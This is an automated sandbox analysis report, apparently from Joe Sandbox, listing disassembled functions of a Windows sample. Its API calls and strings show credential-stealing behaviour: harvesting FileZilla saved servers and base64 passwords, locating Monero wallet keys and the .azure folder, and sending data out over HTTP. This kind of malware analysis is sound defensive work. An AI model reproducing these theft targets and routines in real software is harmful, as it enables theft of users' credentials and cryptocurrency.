                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ce2edd47a5016d0291367b3cefce158c1e612958b10184052f59f23fa0ec3265
                                  • Instruction ID: b31b23c766b494754fc978b0a2aa7d77ad01b69251b16aa638431a456e0ae8ea
                                  • Opcode Fuzzy Hash: ce2edd47a5016d0291367b3cefce158c1e612958b10184052f59f23fa0ec3265
                                  • Instruction Fuzzy Hash: A83136B3A3E2289FD2507D58DC87676F3D8DB05250F46063EDA87D77C0E5E1682282C2
                                  Function 00E59750 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  Function 00E50250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E58E0B
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                    • Part of subcall function 00E499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E499EC
                                    • Part of subcall function 00E499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E49A11
                                    • Part of subcall function 00E499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E49A31
                                    • Part of subcall function 00E499C0: ReadFile.KERNEL32(000000FF,?,00000000,00E4148F,00000000), ref: 00E49A5A
                                    • Part of subcall function 00E499C0: LocalFree.KERNEL32(00E4148F), ref: 00E49A90
                                    • Part of subcall function 00E499C0: CloseHandle.KERNEL32(000000FF), ref: 00E49A9A
                                    • Part of subcall function 00E58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E58E52
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00E60DBA,00E60DB7,00E60DB6,00E60DB3), ref: 00E50362
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E50369
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00E50385
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB2), ref: 00E50393
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00E503CF
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB2), ref: 00E503DD
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00E50419
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB2), ref: 00E50427
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00E50463
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB2), ref: 00E50475
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB2), ref: 00E50502
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB2), ref: 00E5051A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB2), ref: 00E50532
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB2), ref: 00E5054A
                                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00E50562
                                  • lstrcat.KERNEL32(?,profile: null), ref: 00E50571
                                  • lstrcat.KERNEL32(?,url: ), ref: 00E50580
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E50593
                                  • lstrcat.KERNEL32(?,00E61678), ref: 00E505A2
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E505B5
                                  • lstrcat.KERNEL32(?,00E6167C), ref: 00E505C4
                                  • lstrcat.KERNEL32(?,login: ), ref: 00E505D3
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E505E6
                                  • lstrcat.KERNEL32(?,00E61688), ref: 00E505F5
                                  • lstrcat.KERNEL32(?,password: ), ref: 00E50604
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E50617
                                  • lstrcat.KERNEL32(?,00E61698), ref: 00E50626
                                  • lstrcat.KERNEL32(?,00E6169C), ref: 00E50635
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB2), ref: 00E5068E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 1942843190-555421843
                                  • Opcode ID: 158b4186e753383151227316240b6a635da4fb72bb4e5063bc8905313fe77f0c
                                  • Instruction ID: 521a6d7f2293f651207f73c0d74c42be301d27a8261a66c52fc0a2a270c0f689
                                  • Opcode Fuzzy Hash: 158b4186e753383151227316240b6a635da4fb72bb4e5063bc8905313fe77f0c
                                  • Instruction Fuzzy Hash: 2ED13071910208ABCB04EBE0DD9ADEE7778BF14301F545929F542B7085EF79AA09CB61
                                  Function 00E45960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                    • Part of subcall function 00E447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E44839
                                    • Part of subcall function 00E447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E44849
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E459F8
                                  • StrCmpCA.SHLWAPI(?,01CBF318), ref: 00E45A13
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E45B93
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,01CBF3B8,00000000,?,01CBAF70,00000000,?,00E61A1C), ref: 00E45E71
                                  • lstrlen.KERNEL32(00000000), ref: 00E45E82
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00E45E93
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E45E9A
                                  • lstrlen.KERNEL32(00000000), ref: 00E45EAF
                                  • lstrlen.KERNEL32(00000000), ref: 00E45ED8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E45EF1
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00E45F1B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E45F2F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00E45F4C
                                  • InternetCloseHandle.WININET(00000000), ref: 00E45FB0
                                  • InternetCloseHandle.WININET(00000000), ref: 00E45FBD
                                  • HttpOpenRequestA.WININET(00000000,01CBF398,?,01CBE7B0,00000000,00000000,00400100,00000000), ref: 00E45BF8
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00E45FC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 874700897-2180234286
                                  • Opcode ID: 178b632205b1345442e10fd074c3fe0eb37cf355193b6ab8417ca4d8b8ab9ed3
                                  • Instruction ID: 68a26d256ef43098accc8bfee2558d5e5146c3bb55b5eec61b62fa6a6a9a04ac
                                  • Opcode Fuzzy Hash: 178b632205b1345442e10fd074c3fe0eb37cf355193b6ab8417ca4d8b8ab9ed3
                                  • Instruction Fuzzy Hash: 84122272920128ABCB19EBA0DC99FDE73B8BF54701F4456A9B50673091EF342A4DCF61
                                  Function 00E4CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                    • Part of subcall function 00E58B60: GetSystemTime.KERNEL32(00E60E1A,01CBAD00,00E605AE,?,?,00E413F9,?,0000001A,00E60E1A,00000000,?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E58B86
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E4CF83
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E4D0C7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E4D0CE
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E4D208
                                  • lstrcat.KERNEL32(?,00E61478), ref: 00E4D217
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E4D22A
                                  • lstrcat.KERNEL32(?,00E6147C), ref: 00E4D239
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E4D24C
                                  • lstrcat.KERNEL32(?,00E61480), ref: 00E4D25B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E4D26E
                                  • lstrcat.KERNEL32(?,00E61484), ref: 00E4D27D
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E4D290
                                  • lstrcat.KERNEL32(?,00E61488), ref: 00E4D29F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E4D2B2
                                  • lstrcat.KERNEL32(?,00E6148C), ref: 00E4D2C1
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E4D2D4
                                  • lstrcat.KERNEL32(?,00E61490), ref: 00E4D2E3
                                    • Part of subcall function 00E5A820: lstrlen.KERNEL32(00E44F05,?,?,00E44F05,00E60DDE), ref: 00E5A82B
                                    • Part of subcall function 00E5A820: lstrcpy.KERNEL32(00E60DDE,00000000), ref: 00E5A885
                                  • lstrlen.KERNEL32(?), ref: 00E4D32A
                                  • lstrlen.KERNEL32(?), ref: 00E4D339
                                    • Part of subcall function 00E5AA70: StrCmpCA.SHLWAPI(01CB9A70,00E4A7A7,?,00E4A7A7,01CB9A70), ref: 00E5AA8F
                                  • DeleteFileA.KERNEL32(00000000), ref: 00E4D3B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                  • String ID:
                                  • API String ID: 1956182324-0
                                  • Opcode ID: 09402192f8ad6a94aa5ca325f13207043df07a692e2645a635b25c346026f214
                                  • Instruction ID: b3523f6e01151d9e381b082f7b2c25befd35222547ea87bee25babe337e8d9e7
                                  • Opcode Fuzzy Hash: 09402192f8ad6a94aa5ca325f13207043df07a692e2645a635b25c346026f214
                                  • Instruction Fuzzy Hash: 94E18472910108DBCB18EBA0DD96EEE73B8BF54301F145669F543B3091EE39AE09CB61
                                  Function 00E4C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,01CBDD70,00000000,?,00E6144C,00000000,?,?), ref: 00E4CA6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00E4CA89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00E4CA95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E4CAA8
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00E4CAD9
                                  • StrStrA.SHLWAPI(?,01CBDBF0,00E60B52), ref: 00E4CAF7
                                  • StrStrA.SHLWAPI(00000000,01CBDD88), ref: 00E4CB1E
                                  • StrStrA.SHLWAPI(?,01CBDEF8,00000000,?,00E61458,00000000,?,00000000,00000000,?,01CB9B20,00000000,?,00E61454,00000000,?), ref: 00E4CCA2
                                  • StrStrA.SHLWAPI(00000000,01CBDE98), ref: 00E4CCB9
                                    • Part of subcall function 00E4C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E4C871
                                    • Part of subcall function 00E4C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E4C87C
                                  • StrStrA.SHLWAPI(?,01CBDE98,00000000,?,00E6145C,00000000,?,00000000,01CB99D0), ref: 00E4CD5A
                                  • StrStrA.SHLWAPI(00000000,01CB97C0), ref: 00E4CD71
                                    • Part of subcall function 00E4C820: lstrcat.KERNEL32(?,00E60B46), ref: 00E4C943
                                    • Part of subcall function 00E4C820: lstrcat.KERNEL32(?,00E60B47), ref: 00E4C957
                                    • Part of subcall function 00E4C820: lstrcat.KERNEL32(?,00E60B4E), ref: 00E4C978
                                  • lstrlen.KERNEL32(00000000), ref: 00E4CE44
                                  • CloseHandle.KERNEL32(00000000), ref: 00E4CE9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                  • String ID:
                                  • API String ID: 3744635739-3916222277
                                  • Opcode ID: 351abde6a7355e8e041adc1d580ffe10ebdb125e3daa4733bbca1c0547b87584
                                  • Instruction ID: 3fe701b8d5d485de6b1f8dbe052fc45d4ef5638cb3ce3937ab4fd8fc01045479
                                  • Opcode Fuzzy Hash: 351abde6a7355e8e041adc1d580ffe10ebdb125e3daa4733bbca1c0547b87584
                                  • Instruction Fuzzy Hash: EFE14D72900108ABDB18EBA0DC96FEEB7B8BF54301F045669F54673191EF346A4ECB61
                                  Function 00E58320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  • RegOpenKeyExA.ADVAPI32(00000000,01CBBD40,00000000,00020019,00000000,00E605B6), ref: 00E583A4
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E58426
                                  • wsprintfA.USER32 ref: 00E58459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E5847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E5848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E58499
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 3246050789-3278919252
                                  • Opcode ID: 794bfc436cebcc9308199b0634c6bee44d8d021ef1a93fef597c2ed4e00a399c
                                  • Instruction ID: f7469c77319e6e46fbc666a2119afef7000b0911b6efd3a5c6b2c93b182a8961
                                  • Opcode Fuzzy Hash: 794bfc436cebcc9308199b0634c6bee44d8d021ef1a93fef597c2ed4e00a399c
                                  • Instruction Fuzzy Hash: 28812BB1910118EBDB28DF50CD95FEAB7B8BF48701F008699E549B6140DF756B89CFA0
                                  Function 00E54D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E58E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E54DB0
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 00E54DCD
                                    • Part of subcall function 00E54910: wsprintfA.USER32 ref: 00E5492C
                                    • Part of subcall function 00E54910: FindFirstFileA.KERNEL32(?,?), ref: 00E54943
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E54E3C
